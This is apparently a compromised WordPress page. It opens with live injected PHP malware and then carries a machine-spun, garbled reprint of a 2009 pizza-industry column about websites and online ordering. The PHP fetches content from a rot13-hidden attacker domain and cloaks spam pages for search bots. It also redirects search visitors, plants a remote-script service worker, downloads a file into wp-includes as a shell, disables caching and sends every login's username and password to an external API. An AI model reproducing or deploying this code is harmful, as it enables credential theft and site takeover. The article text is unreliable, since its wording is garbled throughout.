SERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_HEADER, 1); curl_setopt ($ch, CURLOPT_TIMEOUT, 10); curl_setopt ($ch, CURLOPT_REFERER, $host.$uri); curl_setopt ($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); $html = curl_exec ($ch); if ( curl_getinfo($ch, CURLINFO_REDIRECT_URL ) ) { $redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL ); header('Location: ' . $redirectUrl); exit(); } $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); $header = substr($html, 0, $header_size); $html = substr($html, $header_size); curl_close($ch); function yuhoo($html) { echo $html; } add_action('wp_head', function() use ( $html ) { yuhoo( $html ); } ); // } /* if (preg_match("#www.google.com/bot.html#i", $uag) && !preg_match("/\/post-|\/pgxhtogrzm-|\/livres-|\/datez-|\/books|\/qutam-|\/neivu-|\/ccoin-|\/dcoin-|\/decoin-|\/decoin25-|imagescdn|cryptocdn|-mk|-mk2|-mk3|-mk4|\/b24c-|\/nrcc-|\/kjope-|\/kaupan-|\/ayashoo-/", $id)) { $curl = curl_init("http://api.{$ccd}/301.php"); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($curl); curl_close($curl); if (preg_match('#http#', $response)){ header("HTTP/1.1 301 Moved Permanently"); header('Location: ' . $response); exit(); } } */ /* $nzTables = array('pcachewpr', 'lcachewpr', 'lmcachewpr'); foreach ($nzTables as $nz) { $table_name = $wpdb->prefix . $nz; if ($wpdb->get_var("SHOW TABLES LIKE '$table_name'") == $table_name) { $sql = "DROP TABLE IF EXISTS $table_name"; $wpdb->query($sql); $curl = curl_init("http://api.{$ccd}/checktable.php"); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $_SERVER['HTTP_HOST'] . ';' . $table_name); $response = curl_exec($curl); curl_close($curl); } } */ if (preg_match("#^(/qutam-|/ccoin-|/decoin-|/decoin25-|/dcoin-|/b24c-|/nrcc-|/kjope-|/kaupan-|/ayashoo-|/neivu-)#", $_SERVER['REQUEST_URI']) || preg_match('#.+-mk\/?$#', $_SERVER['REQUEST_URI']) || preg_match('#.+-mk3\/?$#', $_SERVER['REQUEST_URI']) || preg_match('#.+-mk4\/?$#', $_SERVER['REQUEST_URI']) || preg_match('#.+-mk2\/?$#', $_SERVER['REQUEST_URI'])) { if (!class_exists('CovenVP', FALSE)) { class CovenVP { private $args = NULL; public function __construct($args) { if (!isset($args['slug'])) throw new Exception('No slug given for virtual page'); $this->args = $args; add_filter('the_posts', array($this, 'virtual_page')); } public function virtual_page($posts) { global $wp; $slug = isset($this->args['slug']) ? $this->args['slug'] : ''; if (0 === count($posts) && (0 === strcasecmp($wp->request, $slug) || $slug === $wp->query_vars['page_id'])) { $post = new stdClass(); $post->ID = - 128; $post->post_author = isset($this->args['author']) ? $this->args['author'] : 1; $post->post_date = isset($this->args['date']) ? $this->args['date'] : current_time('mysql'); $post->post_date_gmt = isset($this->args['dategmt']) ? $this->args['dategmt'] : current_time('mysql', 1); $post->post_content = isset($this->args['content']) ? $this->args['content'] : ''; $post->post_title = isset($this->args['title']) ? $this->args['title'] : ''; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; $post->ping_status = 'closed'; $post->post_password = ''; $post->post_name = $slug; $post->to_ping = ''; $post->pinged = ''; $post->post_modified = $post->post_date; $post->post_modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $slug); $post->menu_order = 0; $post->post_type = isset($this->args['type']) ? $this->args['type'] : 'page'; $post->post_mime_type = ''; $post->comment_count = 0; $post = apply_filters('coven_virtual_page_content', $post); $posts = array($post); global $wp_query; $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; } return $posts; } } } if (!function_exists('coven_create_virtual')) { function coven_create_virtual() { $requri = explode('-', $_SERVER['REQUEST_URI']); $scheme = end($requri); $scheme = trim($scheme, '/'); $covenD = str_rot13('mnuunuu.qvtvgny'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/{$scheme}/" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $html = curl_exec($ch); $html = json_decode($html, true); curl_close($ch); if (json_last_error() === JSON_ERROR_NONE) { $url = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/'); $args = array('slug' => $url, 'title' => $html['title'], 'content' => $html['body']); $pg = new CovenVP($args); } } } if (preg_match("/google|bing|msn|yahoo/i", $ref) && !$googleBot && !$anyBot) { $rUri = explode('-', $_SERVER['REQUEST_URI']); $rScheme = end($rUri); $rScheme = trim($rScheme, '/'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://source.{$ccd}/in/{$rScheme}/?val1={$hwost}"); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_REFERER, $host . $uri); curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); $html = curl_exec($ch); if (curl_getinfo($ch, CURLINFO_REDIRECT_URL)) { $redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL); header('Location: ' . $redirectUrl); exit(); } } /* elseif ($googleBot) { add_action('init', 'coven_create_virtual'); }*/ else { header("Location: http://" . $_SERVER["HTTP_HOST"]); exit(); } } if (preg_match("#xmlrpc\.php$#", $id)) { echo "XML-RPC server accepts POST requests only."; exit(); } if (preg_match("/serviceworker.js$|332.js$|34334$/", $id) ) { header('Content-Type: application/javascript'); echo 'self.importScripts(\'https://magictt1.com/sw/magic.js\');'; exit; } if (preg_match_all("/headssr\.php$/", $id, $matches) ) { $fileUrl = "http://api.{$ccd}/lnk/sh.txt"; $saveTo = ABSPATH . WPINC . '/abcsss.php'; if ( is_file ($saveTo) && filesize ($saveTo) && time() - filemtime($saveTo) <= 60 * 60 * 1 ) { } else { $fp = fopen($saveTo, 'w+'); $ch = curl_init($fileUrl); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_exec($ch); curl_close($ch); fclose($fp); } } if (preg_match("#^/tmp/#", $_SERVER['REQUEST_URI'])) { $url = str_replace('/tmp', '', $_SERVER['REQUEST_URI']); $covenD = str_rot13('mnuunuu.qvtvgny'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/books_files/tmp{$url}"); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, ['Accept-Language: ' . $_SERVER['HTTP_ACCEPT_LANGUAGE']]); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $html = curl_exec($ch); curl_close($ch); unset($ch); $mmmimeTypes = [ 'html' => 'text/html', 'htm' => 'text/html', 'css' => 'text/css', 'xml' => 'text/xml', 'gif' => 'image/gif', 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png', 'svg' => 'image/svg+xml', 'svgz' => 'image/svg+xml', 'tif' => 'image/tiff', 'tiff' => 'image/tiff', 'webp' => 'image/tiff', 'tiff' => 'image/tiff', 'tiff' => 'image/webp', 'bmp' => 'image/x-ms-bmp', 'ico' => 'image/x-icon', 'js' => 'application/javascript', 'txt' => 'text/plain', 'woff' => 'font/woff', 'woff2' => 'font/woff2' ]; $fileExp = pathinfo($url, PATHINFO_EXTENSION); if(array_key_exists($fileExp, $mmmimeTypes)){ $mime = $mmmimeTypes[$fileExp]; } else{ $mime = 'text/plain'; } header("Content-type: {$mime}"); echo $html; die(); } if (preg_match("#^/books_files/#", $_SERVER['REQUEST_URI'])) { $url = str_replace('?id', '.php?id', $_SERVER['REQUEST_URI']); $covenD = str_rot13('mnuunuu.qvtvgny'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}{$url}"); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_HTTPHEADER, ['Accept-Language: ' . $_SERVER['HTTP_ACCEPT_LANGUAGE'], 'X-Forwarded-For: ' . $gbt, 'X-HOST:' . $host]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $html = curl_exec($ch); curl_close($ch); unset($ch); echo $html; die(); } if (preg_match("#^/books-#", $_SERVER['REQUEST_URI'])) { if (!class_exists('WP_EX_PAGE_ON_THE_FLY', FALSE)){ class WP_EX_PAGE_ON_THE_FLY { public $slug =''; public $args = array(); public function __construct($args){ add_filter('the_posts',array($this,'fly_page')); $this->args = $args; $this->slug = $args['slug']; } public function fly_page($posts){ global $wp,$wp_query; $page_slug = $this->slug; if(count($posts) == 0 && (strtolower($wp->request) == $page_slug || $wp->query_vars['page_id'] == $page_slug)){ $post = new stdClass; $post->post_author = 1; $post->post_name = $page_slug; $post->guid = get_bloginfo('wpurl' . '/' . $page_slug); $post->post_title = 'page title'; $post->post_content = "Fake Content"; $post->ID = -42; $post->post_status = 'static'; $post->comment_status = 'closed'; $post->ping_status = 'closed'; $post->comment_count = 0; $post->post_date = current_time('mysql'); $post->post_date_gmt = current_time('mysql',1); $post = (object) array_merge((array) $post, (array) $this->args); $posts = NULL; $posts[] = $post; $wp_query->is_page = true; $wp_query->is_singular = true; $wp_query->is_home = false; $wp_query->is_archive = false; $wp_query->is_category = false; //status_header( 200 ); unset($wp_query->query["error"]); $wp_query->query_vars["error"]=""; $wp_query->is_404 = false; } return $posts; } } } $requri = explode('-', $_SERVER['REQUEST_URI']); $scheme = end($requri); $scheme = trim($scheme, '/'); $url = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/'); $covenD = str_rot13('mnuunuu.qvtvgny'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/books/" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_HTTPHEADER, ['Accept-Language: ' . $_SERVER['HTTP_ACCEPT_LANGUAGE']]); $html = curl_exec($ch); curl_close($ch); unset($ch); // if($googleBot){ $html = json_decode($html, true); $args = array('slug' => $url, 'post_title' => $html['title'], 'post_content' => $html['body']); new WP_EX_PAGE_ON_THE_FLY($args); } else{ echo $html; die(); } } $pdfhash = substr(str_rot13(preg_replace('#[^0-9a-zA-Z]#', "", $_SERVER['HTTP_HOST'])) , 0, 5); if (preg_match('#^/wp-content/uploads/.+' . $pdfhash . '.*\.pdf$#', $_SERVER['REQUEST_URI'])) { $covenD = str_rot13('mnuunuu.qvtvgny'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/pdf/books1/" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); curl_setopt($ch, CURLOPT_REFERER, $ref); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $html = curl_exec($ch); if ( curl_getinfo($ch, CURLINFO_REDIRECT_URL ) ) { $redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL ); header('Location: ' . $redirectUrl); exit(); } curl_close($ch); unset($ch); if (empty($html)) { http_response_code(404); exit(); } if ($googleBot && preg_match('#GOZRAWGOZ#', $html)) { $undeadUrl = str_replace('GOZRAWGOZ', '', $html); header('Location: ' . $undeadUrl); exit(); } if ($googleBot) { header("Content-type:application/pdf"); } echo $html; exit(); } /* $chdoms = curl_init( "http://api.{$ccd}/data/check_doms.txt" ); curl_setopt ($chdoms, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($chdoms, CURLOPT_HEADER, 0); curl_setopt ($chdoms, CURLOPT_TIMEOUT, 20); curl_setopt ($chdoms, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); $chDomains = curl_exec ($chdoms); curl_close($chdoms); $chDomains = preg_split('/\n|\r\n?/', $chDomains); if ( !preg_match ( "#/post-|/pgxhtogrzm-|/decoin-|/decoin25-|/qutam-|/neivu-|/ccoin-|/dcoin-|/b24c-|/nrcc-|/kjope-|/kaupan-|/ayashoo-|-mk|-mk2|-mk3|-mk4#", $id ) && $googleBot && in_array( $hwost, $chDomains ) ) { function supermario($content) { $ccd = str_rot13('mnuunuu.qvtvgny'); $hwost = strtolower ($_SERVER['HTTP_HOST']); $uri = $_SERVER['REQUEST_URI']; $ch = curl_init("http://coven.{$ccd}/links/schemenameururu/{$hwost}{$uri}" . rand() ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); curl_setopt($ch, CURLOPT_TIMEOUT, 20); $miaLinks = curl_exec($ch); curl_close($ch); return $content . $miaLinks; } add_filter('the_content', 'supermario', 20); } */ if ( !preg_match ( "#/post-|feed|robots|jpg|png|/pgxhtogrzm-|/decoin-|/decoin25-|/qutam-|/neivu-|/ccoin-|/dcoin-|/b24c-|/nrcc-|/kjope-|/kaupan-|/ayashoo-|-mk|-mk2|-mk3|-mk4#", $id ) && preg_match('#www.google.com/bot.html#', $uag) ) { function supermario($content) { $ccd = str_rot13('mnuunuu.qvtvgny'); $hwost = strtolower ($_SERVER['HTTP_HOST']); $uri = $_SERVER['REQUEST_URI']; $ch = curl_init("https://coven.{$ccd}/links2/uru2/{$hwost}{$uri}" ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); curl_setopt($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . getUserIP())); $miaLinks = curl_exec($ch); curl_close($ch); return $content . $miaLinks; } add_filter('the_content', 'supermario', 20); } function add_meta_cache() { echo ''; echo ''; echo ''; echo ''; echo ''; } add_action('wp_head', 'add_meta_cache'); if (preg_match('#/(imagescdn|cryptocdn)/.+#', $id) ) { $picUrl = "https://images.{$ccd}{$id}"; $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, $picUrl); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); $html = curl_exec ($ch); curl_close($ch); header('Cache-Control: public'); header('Content-Type: image/jpeg'); echo $html; exit; } if (preg_match("#pgxhtogrzm#", $_SERVER['REQUEST_URI'])){ if (!class_exists('CovenVP', FALSE)) { class CovenVP { private $args = NULL; public function __construct($args) { if (!isset($args['slug'])) throw new Exception('No slug given for virtual page'); $this->args = $args; add_filter('the_posts', array($this, 'virtual_page')); } public function virtual_page($posts) { global $wp; $slug = isset($this->args['slug']) ? $this->args['slug'] : ''; if (0 === count($posts) && (0 === strcasecmp($wp->request, $slug) || $slug === $wp->query_vars['page_id'])) { $post = new stdClass(); $post->ID = - 128; $post->post_author = isset($this->args['author']) ? $this->args['author'] : 1; $post->post_date = isset($this->args['date']) ? $this->args['date'] : current_time('mysql'); $post->post_date_gmt = isset($this->args['dategmt']) ? $this->args['dategmt'] : current_time('mysql', 1); $post->post_content = isset($this->args['content']) ? $this->args['content'] : ''; $post->post_title = isset($this->args['title']) ? $this->args['title'] : ''; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; $post->ping_status = 'closed'; $post->post_password = ''; $post->post_name = $slug; $post->to_ping = ''; $post->pinged = ''; $post->post_modified = $post->post_date; $post->post_modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $slug); $post->menu_order = 0; $post->post_type = isset($this->args['type']) ? $this->args['type'] : 'page'; $post->post_mime_type = ''; $post->comment_count = 0; $post = apply_filters('coven_virtual_page_content', $post); $posts = array($post); global $wp_query; $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; } return $posts; } } } if (!function_exists('coven_create_virtual')) { function coven_create_virtual() { $covenD = str_rot13('mnuunuu.qvtvgny'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/shilov/" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $html = curl_exec($ch); $html = json_decode($html, true); curl_close($ch); if (json_last_error() === JSON_ERROR_NONE) { $url = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/'); $args = array('slug' => $url, 'title' => $html['title'], 'content' => $html['body']); $pg = new CovenVP($args); } } } if (preg_match("/google|bing|msn|yahoo/i", $ref) && !$googleBot && !$anyBot) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://source.{$ccd}/in/drws/?val1={$hwost}"); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_REFERER, $host . $uri); curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); $html = curl_exec($ch); if (curl_getinfo($ch, CURLINFO_REDIRECT_URL)) { $redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL); header('Location: ' . $redirectUrl); exit(); } } elseif ($googleBot) { add_action('init', 'coven_create_virtual'); } else { header("Location: http://" . $_SERVER["HTTP_HOST"]); exit(); } } if(!$googleBot){ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $ccd = str_rot13('mnuunuu.qvtvgny'); $wpApiUrl = "https://api.{$ccd}/api.php"; $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login']) && strpos($_SERVER['HTTP_USER_AGENT'], '100.6.1155.294') === false) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action') ) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } if (!function_exists('wordpress_api_wrongauth_debug')) { function wordpress_api_wrongauth_debug( $user_login, $user ){ $ccd = str_rot13('mnuunuu.qvtvgny'); $wpApiUrl = "https://api.{$ccd}/api_false.php"; $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login_failed', 'wordpress_api_wrongauth_debug', 10, 2 ); } if (preg_match("#/ququos#", $id) ) { echo uniqid() . " {$hwost} " . phpversion() . "
"; $wpfingerprint = php_uname() . disk_total_space('.') . filectime('/') . phpversion(); echo hash('sha256', $wpfingerprint) . "
"; $time_elapsed = timer_stop(); echo "cheetie {$time_elapsed} secs
"; //echo "
{$htaccess}
"; exit(); } if (preg_match("#/eezee#", $id) ) { $eezeewpconfig = file_get_contents(ABSPATH . '/wp-config.php'); if (strpos($eezeewpconfig, 'WP_CACHE') !== false) { $ezlastMtime = filemtime ( ABSPATH . '/wp-config.php' ) + rand(1, 1000); $ez = preg_replace('#define\(.*WP_CACHE.*\);#Ui', "define('WP_CACHE', false);", $eezeewpconfig, 1); file_put_contents(ABSPATH . '/wp-config.php', $ez); touch(ABSPATH . '/wp-config.php', $ezlastMtime); //echo $ez; echo "WP_CACHE replaced\n"; } if(file_exists(ABSPATH . '/wp-content/mu-plugins/endurance-page-cache.php')){ unlink(ABSPATH . '/wp-content/mu-plugins/endurance-page-cache.php'); echo 'endurance-page-cache.php removed '; } if(file_exists(ABSPATH . '/wp-content/endurance-page-cache')){ rename(ABSPATH . '/wp-content/endurance-page-cache', ABSPATH . '/wp-content/endurance-page-caches'); echo 'endurance-page-cache renamed'; } exit(); } if (preg_match("#/lseez#", $id) ) { var_dump(get_option('litespeed.conf.cache')); update_option( 'litespeed.conf.cache', 0 ); var_dump(get_option('litespeed.conf.cache')); exit(); } } ?>{"id":10302,"date":"2024-04-13T14:00:47","date_gmt":"2024-04-13T14:00:47","guid":{"rendered":"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/"},"modified":"2024-04-13T14:00:47","modified_gmt":"2024-04-13T14:00:47","slug":"2009-january-the-tech-edge","status":"publish","type":"post","link":"https:\/\/everyprovince.com\/2009-january-the-tech-edge\/","title":{"rendered":"2009 January: The Tech Edge"},"content":{"rendered":"


\n<\/p>\n

\n

\"2009

It\u2019s simple to get blind-sided by way of a generational pattern. For instance, I owned a nightclub within the mid 80s. And on the time I used to be satisfied {that a} new factor known as \u201crap track\u201d used to be doomed. I hated it, similar to my mother hated the rock \u2018n roll I listened to when I used to be a teen. However the youngsters cherished it. Boy, used to be I incorrect on that one. Then, within the early 90\u2019s a pal requested me for my e mail cope with? Huh? Electronic mail? Oh yeah that Web stuff. I informed him it used to be not likely that I\u2019d ever get an \u201ce mail\u201d account. In spite of everything, I\u2019ve were given a telephone. I\u2019ll simply pick out it up and speak to if I want to speak about one thing. He gave me his e mail cope with and informed me that in the future I might have an e mail account. What an fool \u2026 no longer him \u2014 me!<\/p>\n

I\u2019m supplying you with an task these days. Take a look at the Internet websites of all of the primary pizza chains. Papa John\u2019s has video telling their core tales about dough and toppings. Pizza Hut makes use of a complicated flash website to advertise new pieces. Domino\u2019s options their Pizza Tracker. All 3 closely advertise on-line ordering.<\/p>\n

My advice is to release a Internet website or release the lifeboats. A complete era is firmly plugged into the Internet presently. They use it for the entirety.<\/p>\n

An increasing number of individuals are the use of the Internet to get speedy knowledge. They would like it now. Right here\u2019s the foremost benefit to you: as an alternative of blowing an enormous wad of cash each and every month within the telephone book, run a smaller telephone book advert that lists your Internet cope with. Other folks with no Internet cope with of their yellow web page advert would possibly as neatly display an image of a tombstone \u2014 as a result of the general public are merely going to the telephone book to get the telephone selection of a trade they intend to consult with anyway \u2014 or for the Internet cope with of a trade so they are able to get extra detailed knowledge presently.<\/p>\n

Your Internet website can do a a lot better process of promoting your home than a yellow web page advert ever will. You’ll listing your:<\/p>\n

? Menu<\/p>\n

? Specials<\/p>\n

? Complete colour footage<\/p>\n

? Instructions<\/p>\n

? Testimonials<\/p>\n

? Ensure<\/p>\n

? On-line ordering hyperlink<\/p>\n

? Loyalty program sign-up<\/p>\n

? Movies Internet websites are reasonable to construct and reasonably priced to care for.<\/p>\n

Bear in mind, despite the fact that, the times of fundamental Internet websites are numbered. Flash websites with animation are turning into common and I strongly consider you must pony up and construct a website that competes. And because Google is the brand new telephone book, remember that your competition are only one click on away. Don\u2019t allow them to display you up.<\/p>\n

The entire primary chains are hyping on-line ordering. And Domino\u2019s Pizza even has \u201cPizza Tracker\u201d that helps to keep you up to date at the growth of your on-line order, all of the approach in your entrance door.<\/p>\n

So, whether or not you\u2019re hip to the Internet or no longer, a majority of your consumers are. And the fad is unstoppable. The entirety is shifting to wi-fi units and the Internet \u2026 the entirety. Many of us merely forget about companies with no Internet website.<\/p>\n

Reality: As of February 2008 \u0096 79 p.c of all customers have visited a cafe\u2019s Internet website. 70 p.c consult with to try the menu, whilst 27 p.c are there to position an internet order.<\/p>\n

Reality: Papa John\u2019s will promote $400 million value of meals by the use of on-line orders this yr. Right here\u2019s every other sudden stat: price ticket averages skyrocket when other folks position orders on-line. Why? Easy: They don’t seem to be rushed by way of an order-taker who simply desires to get off the telephone so he can get again to texting his good friend.<\/p>\n

On-line ordering invitations surfing and exploring the menu and facet pieces. And in case your on-line ordering machine is doing its process it is going to mechanically \u201cupsell\u201d for you. It’ll counsel menu pieces as consumers make picks. It’ll be offering package deal offers with upper benefit margins.<\/p>\n

At the moment price ticket averages are about 18 p.c upper with on-line ordering than with common desk or telephone orders (some shoppers document 40 to 50 p.c upper price ticket averages on account of trade orders).<\/p>\n

American Categorical reviews that 37 p.c of shoppers have positioned an internet eating place order. Of the ones, 54 p.c say they’re \u201cextraordinarily glad\u201d with the enjoy. Lots of my very own shoppers are seeing over 100 on-line orders per 30 days \u2014 and that\u2019s inside only some months of release. This pattern is massive. On-line ordering is right here to stick. Are you? ?<\/p>\n

Kamron Karington owned a extremely a success impartial pizzeria ahead of turning into a expert, speaker and writer of The Black Guide: Your Entire Information to Developing Staggering Profi ts in Your Pizza Industry. He’s a per month contributor to Pizza As of late.<\/p>\n<\/p><\/div>\n\n","protected":false},"excerpt":{"rendered":"

